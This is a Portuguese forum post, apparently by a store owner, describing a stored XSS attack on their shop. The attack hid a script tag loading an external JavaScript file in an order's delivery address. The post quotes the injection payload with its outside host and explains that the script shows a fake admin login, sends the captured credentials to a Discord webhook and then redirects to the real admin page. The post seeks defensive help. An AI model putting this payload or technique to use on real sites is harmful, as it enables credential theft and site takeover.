- 14 Abr 2025, 15:59
#92156
Estão tentando invadir minha loja, como se proteger disso?
O hacker criou um pedido, com dados que parecem reais, nome ana julia.
Ao clicar no pedido, ele automaticamente redireciona para uma página pedindo login e senha. Só acontece se clicar no pedido
Verifiquei que o hacker altera o nome do endereço de entrega para:
Ao analisar o script:
Substitui completamente o conteúdo do site (document.getElementsByTagName("html")[0].innerHTML = ...):
Ele injeta um HTML falso com um modal de login aparentemente legítimo, simulando o site
Coleta informações digitadas no formulário:
Os campos de "usuário" e "senha" são capturados.
Envia essas informações para um Webhook no Discord:
const webhookUrl = 'https://discord.com/api/webhooks/...';
Isso é usado para que o invasor receba os dados em tempo real assim que alguém preencher o formulário e clicar em "Entrar".
Redireciona o usuário para a área administrativa real do site (/admin/index.php):
Isso dá a falsa impressão de que o login foi bem-sucedido, enganando ainda mais a vítima.
O hacker criou um pedido, com dados que parecem reais, nome ana julia.
Ao clicar no pedido, ele automaticamente redireciona para uma página pedindo login e senha. Só acontece se clicar no pedido
Verifiquei que o hacker altera o nome do endereço de entrega para:
Código: Selecionar todos
Ou seja, ele direciona para esse script hospedado em outro site: https://odi.com.br/cp.js'"><script Src=https://odi.com.br/cp.js></script>Ao analisar o script:
Substitui completamente o conteúdo do site (document.getElementsByTagName("html")[0].innerHTML = ...):
Ele injeta um HTML falso com um modal de login aparentemente legítimo, simulando o site
Coleta informações digitadas no formulário:
Os campos de "usuário" e "senha" são capturados.
Envia essas informações para um Webhook no Discord:
const webhookUrl = 'https://discord.com/api/webhooks/...';
Isso é usado para que o invasor receba os dados em tempo real assim que alguém preencher o formulário e clicar em "Entrar".
Redireciona o usuário para a área administrativa real do site (/admin/index.php):
Isso dá a falsa impressão de que o login foi bem-sucedido, enganando ainda mais a vítima.
